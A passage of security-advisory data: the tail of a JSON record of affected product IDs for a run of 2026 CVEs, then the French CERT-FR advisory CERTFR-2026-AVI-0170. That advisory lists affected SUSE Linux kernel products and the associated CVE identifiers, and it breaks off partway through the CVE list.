"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22986"
},
{
"cve": "CVE-2026-22987",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22987"
},
{
"cve": "CVE-2026-22988",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22989",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22989"
},
{
"cve": "CVE-2026-22990",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22994",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22994"
},
{
"cve": "CVE-2026-22995",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22995"
},
{
"cve": "CVE-2026-22996",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22998",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22998"
},
{
"cve": "CVE-2026-22999",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23002",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23002"
},
{
"cve": "CVE-2026-23003",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23003"
},
{
"cve": "CVE-2026-23004",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23004"
},
{
"cve": "CVE-2026-23005",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23007",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23007"
},
{
"cve": "CVE-2026-23008",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23008"
},
{
"cve": "CVE-2026-23009",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23009"
},
{
"cve": "CVE-2026-23010",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23010"
},
{
"cve": "CVE-2026-23011",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23011"
},
{
"cve": "CVE-2026-23012",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23012"
},
{
"cve": "CVE-2026-23013",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-23013"
}
]
}
CERTFR-2026-AVI-0170
Vulnerability from certfr_avis - Published: 2026-02-13 - Updated: 2026-02-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une atteinte à l'intégrité des données et un contournement de la politique de sécurité.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SUSE | N/A | SUSE Linux Enterprise Micro for Rancher 5.3 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 15 SP5 | ||
| SUSE | N/A | Public Cloud Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.3 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro for Rancher 5.2 | ||
| SUSE | N/A | SUSE Linux Enterprise Workstation Extension 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 12 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 12 SP5 | ||
| SUSE | N/A | Legacy Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro for Rancher 5.4 | ||
| SUSE | N/A | SUSE Linux Enterprise High Availability Extension 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 12 SP5 LTSS | ||
| SUSE | N/A | SUSE Linux Enterprise Desktop 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP7 | ||
| SUSE | N/A | openSUSE Leap 15.5 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 12-SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing LTSS 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP6 LTSS | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.2 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP6 | ||
| SUSE | N/A | openSUSE Leap 15.6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP5 LTSS | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5 | ||
| SUSE | N/A | Development Tools Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 12 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.4 | ||
| SUSE | N/A | openSUSE Leap 15.3 | ||
| SUSE | N/A | Basesystem Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise High Availability Extension 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.5 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Public Cloud Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Workstation Extension 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Legacy Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Desktop 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 12-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing LTSS 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6 LTSS",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5 LTSS",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Development Tools Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Basesystem Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-50669",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50669"
},
{
"name": "CVE-2024-36903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36903"
},
{
"name": "CVE-2023-53761",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53761"
},
{
"name": "CVE-2023-53814",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53814"
},
{
"name": "CVE-2025-40166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40166"
},
{
"name": "CVE-2023-53407",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53407"
},
{
"name": "CVE-2023-54076",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54076"
},
{
"name": "CVE-2023-54208",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54208"
},
{
"name": "CVE-2023-53714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53714"
},
{
"name": "CVE-2023-54039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54039"
},
{
"name": "CVE-2023-53804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53804"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2023-53863",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53863"
},
{
"name": "CVE-2023-54131",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54131"
},
{
"name": "CVE-2023-54142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54142"
},
{
"name": "CVE-2022-50779",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50779"
},
{
"name": "CVE-2023-54111",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54111"
},
{
"name": "CVE-2023-54186",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54186"
},
{
"name": "CVE-2025-68286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68286"
},
{
"name": "CVE-2023-53803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53803"
},
{
"name": "CVE-2022-50641",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50641"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2023-53754",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53754"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2023-54091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54091"
},
{
"name": "CVE-2023-54083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54083"
},
{
"name": "CVE-2023-54280",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54280"
},
{
"name": "CVE-2022-50834",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50834"
},
{
"name": "CVE-2022-50809",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50809"
},
{
"name": "CVE-2023-54270",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54270"
},
{
"name": "CVE-2023-53685",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53685"
},
{
"name": "CVE-2022-50488",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50488"
},
{
"name": "CVE-2025-37751",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37751"
},
{
"name": "CVE-2025-40254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40254"
},
{
"name": "CVE-2023-54021",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54021"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2023-54201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54201"
},
{
"name": "CVE-2025-68200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68200"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2023-54265",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54265"
},
{
"name": "CVE-2022-50630",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50630"
},
{
"name": "CVE-2022-50672",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50672"
},
{
"name": "CVE-2023-54309",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54309"
},
{
"name": "CVE-2022-50776",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50776"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2023-54018",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54018"
},
{
"name": "CVE-2023-54271",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54271"
},
{
"name": "CVE-2022-50702",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50702"
},
{
"name": "CVE-2023-53786",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53786"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2022-50761",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50761"
},
{
"name": "CVE-2022-50866",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50866"
},
{
"name": "CVE-2025-40019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40019"
},
{
"name": "CVE-2023-54112",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54112"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2022-50676",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50676"
},
{
"name": "CVE-2023-53845",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53845"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2022-50622",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50622"
},
{
"name": "CVE-2023-54095",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54095"
},
{
"name": "CVE-2025-68297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68297"
},
{
"name": "CVE-2022-50646",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50646"
},
{
"name": "CVE-2022-50853",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50853"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-40139",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40139"
},
{
"name": "CVE-2023-54100",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54100"
},
{
"name": "CVE-2025-40350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40350"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2025-38243",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38243"
},
{
"name": "CVE-2023-54001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54001"
},
{
"name": "CVE-2025-38563",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38563"
},
{
"name": "CVE-2022-50619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50619"
},
{
"name": "CVE-2025-21658",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21658"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2023-54213",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54213"
},
{
"name": "CVE-2023-54096",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54096"
},
{
"name": "CVE-2022-50636",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50636"
},
{
"name": "CVE-2025-39913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39913"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-40355",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40355"
},
{
"name": "CVE-2023-53837",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53837"
},
{
"name": "CVE-2023-54049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54049"
},
{
"name": "CVE-2024-36357",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36357"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2025-40115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40115"
},
{
"name": "CVE-2024-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54031"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2023-54315",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54315"
},
{
"name": "CVE-2023-54010",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54010"
},
{
"name": "CVE-2022-50774",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50774"
},
{
"name": "CVE-2025-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39689"
},
{
"name": "CVE-2022-50878",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50878"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2023-54211",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54211"
},
{
"name": "CVE-2022-50836",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50836"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2023-54156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54156"
},
{
"name": "CVE-2022-50644",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50644"
},
{
"name": "CVE-2022-50846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50846"
},
{
"name": "CVE-2023-54098",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54098"
},
{
"name": "CVE-2025-71076",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71076"
},
{
"name": "CVE-2022-50842",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50842"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2023-54275",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54275"
},
{
"name": "CVE-2023-52923",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52923"
},
{
"name": "CVE-2025-40198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40198"
},
{
"name": "CVE-2022-50668",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50668"
},
{
"name": "CVE-2023-53818",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53818"
},
{
"name": "CVE-2024-26661",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26661"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2022-50840",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50840"
},
{
"name": "CVE-2023-54305",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54305"
},
{
"name": "CVE-2022-50756",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50756"
},
{
"name": "CVE-2023-54150",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54150"
},
{
"name": "CVE-2023-54199",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54199"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2025-40202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40202"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-38565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38565"
},
{
"name": "CVE-2024-26581",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26581"
},
{
